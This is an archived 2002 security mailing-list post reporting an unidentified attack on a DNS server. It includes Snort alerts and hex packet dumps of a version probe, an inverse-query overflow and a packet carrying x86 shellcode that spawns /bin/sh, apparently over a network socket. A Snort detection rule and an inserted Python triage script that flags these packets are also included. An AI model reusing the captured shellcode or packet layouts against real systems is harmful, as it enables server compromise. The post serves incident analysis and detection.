unidentified DNS attack

From: David Wilburn (dwilburnat_private)
Date: Tue Jan 08 2002 - 13:08:02 PST


    On Sunday January 6th at about 12:18PM (EST), Snort picked up some
    malicious traffic from a Chinese source address to one of our DNS
    servers.  It looks like a tool was launched against us that first does a
    version query, and then launches a couple of attacks, one of which
    exploits the inverse query vulnerability (CVE-1999-0009), and another
    that I cannot identify.  We have no records of any scans from this
    particular source IP.
    
    The unidentified exploit was caught by Snort's statdx RPC rule.  One
    possibility is that the shell code for this exploit was ripped from
    another exploit, possibly the statdx exploit.  Here's the rule that got
    triggered.
    
    alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"RPC EXPLOIT statdx";
    content: "/bin|c74604|/sh";reference:arachnids,442;
    classtype:attempted-admin; sid:1282; rev:1;)
    
    The packet dumps from Snort are pasted below.  All times are in EST. 
    The destination IP has been cleaned.
    
    So, am I looking at some 0-day exploit here, or is this something that
    somebody recognizes?  Any idea what vulnerability this would be
    attempting to exploit?
    
    -Dave Wilburn
    Infosec Engineer/Scientist
    The MITRE Corporation
    
    [**] DNS named version attempt [**]
    01/06-12:18:22.735569 202.96.242.117:3951 -> XXX.XXX.XXX.XXX:53
    UDP TTL:41 TOS:0x0 ID:35630 IpLen:20 DgmLen:58
    Len: 38
    23 BF 00 00 00 01 00 00 00 00 00 00 07 76 65 72  #............ver
    73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03        sion.bind.....
    
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
    [**] DNS named iquery attempt [**]
    01/06-12:18:23.024562 202.96.242.117:3951 -> XXX.XXX.XXX.XXX:53
    UDP TTL:41 TOS:0x0 ID:35962 IpLen:20 DgmLen:493
    Len: 473
    23 BF 09 80 00 00 00 01 00 00 00 00 3E 41 41 41  #...........>AAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 3E 42 42 42 42  AAAAAAAAAAA>BBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 3E 43 43 43 43 43  BBBBBBBBBB>CCCCC
    43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    43 43 43 43 43 43 43 43 43 3E 00 01 02 03 04 05  CCCCCCCCC>......
    06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15  ................
    16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25  .......... !"#$%
    26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35  &'()*+,-./012345
    36 37 38 39 3A 3B 3C 3D 3E 45 45 45 45 45 45 45  6789:;<=>EEEEEEE
    45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
    45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
    45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
    45 45 45 45 45 45 45 3E 46 46 46 46 46 46 46 46  EEEEEEE>FFFFFFFF
    46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
    46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
    46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
    46 46 46 46 46 46 3D 47 47 47 47 47 47 47 47 47  FFFFFF=GGGGGGGGG
    47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
    47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
    47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
    47 47 47 47 00 00 01 00 01 00 00 00 01 00 FF 40  GGGG...........@
    66                                               f
    
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
    [**] RPC EXPLOIT statdx [**]
    01/06-12:18:23.312228 202.96.242.117:3951 -> XXX.XXX.XXX.XXX:53
    UDP TTL:41 TOS:0x0 ID:35966 IpLen:20 DgmLen:538
    Len: 518
    23 BF 00 00 00 01 00 00 00 00 00 01 3C 90 89 E6  #...........<...
    83 C6 40 C7 06 02 00 0B AC C7 46 04 97 C4 47 A0  ..@.......F...G.
    31 C0 89 46 08 89 46 0C 31 C0 89 46 28 40 89 46  1..F..F.1..F(@.F
    24 40 89 46 20 8D 4E 20 31 DB 43 31 C0 83 C0 66  $@.F .N 1.C1...f
    51 53 50 CD 80 89 46 20 90 3C 90 8D 06 89 46 24  QSP...F .<....F$
    31 C0 83 C0 10 89 46 28 58 5B 59 43 43 FF 76 20  1.....F(X[YCC.v 
    CD 80 5B 4F 74 32 8B 04 24 89 46 08 90 BD CA 60  ..[Ot2..$.F....`
    F2 75 89 6E 04 C7 06 03 80 35 86 B8 04 00 00 00  .u.n.....5......
    8D 0E 31 D2 83 C2 0C CD 80 C7 06 02 00 61 BD 89  ..1..........a..
    6E 04 90 31 FF 47 EB 88 90 31 C0 83 C0 3F 31 C9  n..1.G...1...?1.
    50 CD 80 58 41 CD 80 C7 06 2F 62 69 6E C7 46 04  P..XA..../bin.F.
    2F 73 68 00 89 F0 83 C0 08 89 46 08 31 C0 89 46  /sh.......F.1..F
    0C B0 0B 8D 56 0C 8D 4E 08 89 F3 CD 80 31 C0 40  ....V..N.....1.@
    CD 80 3E 41 41 41 41 41 41 41 41 41 41 41 41 41  ..>AAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 3E 42 42 42 42 42 42 42 42 42 42 42 42 42 42  A>BBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    03 43 43 43 10 06 00 00 00 B7 FD FF FF E3 FF FF  .CCC............
    FF 00 FF FF FF 3E 41 41 41 41 41 41 41 41 41 41  .....>AAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    41 41 41 41 3E 42 42 42 42 42 42 42 42 42 42 42  AAAA>BBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    42 42 42 10 43 43 43 43 43 43 43 43 43 43 43 43  BBB.CCCCCCCCCCCC
    43 43 43 43 00 00 01 00 01 00 00 FA 00 FF        CCCC..........
    
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
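As an added triage example (my code, not part of Dave's post), the script below decodes the DNS header and question of a payload and flags the three traits the dumps above show: the version.bind TXT/CHAOS query, the opcode-1 inverse query, and the contiguous /bin|c7 46 04|/sh byte string that Snort sid:1282 keys on. The sample payloads are constructed from the leading bytes of the three dumps and truncated, so a question name that overruns the buffer is reported rather than crashing the parser.

```python
import struct
# Constructed samples: the 12-byte DNS header of each dump above plus the bytes needed for
# the checks (full version.bind question; first iquery label; the Snort content string).
SAMPLES = {
    "version": bytes.fromhex("23BF000000010000000000000776657273696F6E0462696E640000100003"),
    "iquery": bytes.fromhex("23BF09800000000100000000") + b"\x3e" + b"A" * 62,
    "statdx": bytes.fromhex("23BF00000001000000000001") + b"\x3c\x90\x89\xe6/bin\xc7\x46\x04/sh\x00",
}

SHELL_PATTERN = b"/bin\xc7\x46\x04/sh"   # content of Snort sid:1282 ("/bin|c74604|/sh") as bytes

def parse_header(pkt):
    """Decode the fixed 12-byte DNS header; the opcode is bits 11-14 of the flags word."""
    if len(pkt) < 12:
        raise ValueError("truncated DNS header")
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", pkt[:12])
    return {"id": ident, "flags": flags, "opcode": (flags >> 11) & 0xF,
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}

def parse_name(pkt, off):
    """Read one uncompressed DNS name starting at off; returns (name, offset after it)."""
    labels = []
    while off < len(pkt):
        n = pkt[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n > 63 or off + 1 + n > len(pkt):   # also rejects compression pointers (>= 0xC0)
            raise ValueError("bad label length %d at offset %d" % (n, off))
        labels.append(pkt[off + 1:off + 1 + n].decode("latin-1"))
        off += 1 + n
    raise ValueError("name runs past end of packet")

def classify(pkt):
    """Return the list of suspicious traits found in one DNS payload."""
    hdr = parse_header(pkt)
    findings = []
    if hdr["opcode"] == 1:
        findings.append("inverse query (opcode IQUERY)")
    if hdr["opcode"] == 0 and hdr["qdcount"] >= 1:
        try:
            name, off = parse_name(pkt, 12)
            qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
        except (ValueError, struct.error):
            findings.append("question section does not parse")
        else:
            if name.lower() == "version.bind" and qtype == 16 and qclass == 3:
                findings.append("version.bind TXT/CHAOS query")
    if SHELL_PATTERN in pkt:
        findings.append("statdx-style /bin/sh shellcode string")
    return findings
```

Running classify over each sample yields one finding per packet that matches the Snort alert names in the post, plus a parse failure for the statdx payload whose first "label" is 60 bytes of code.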
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jan 08 2002 - 14:44:15 PST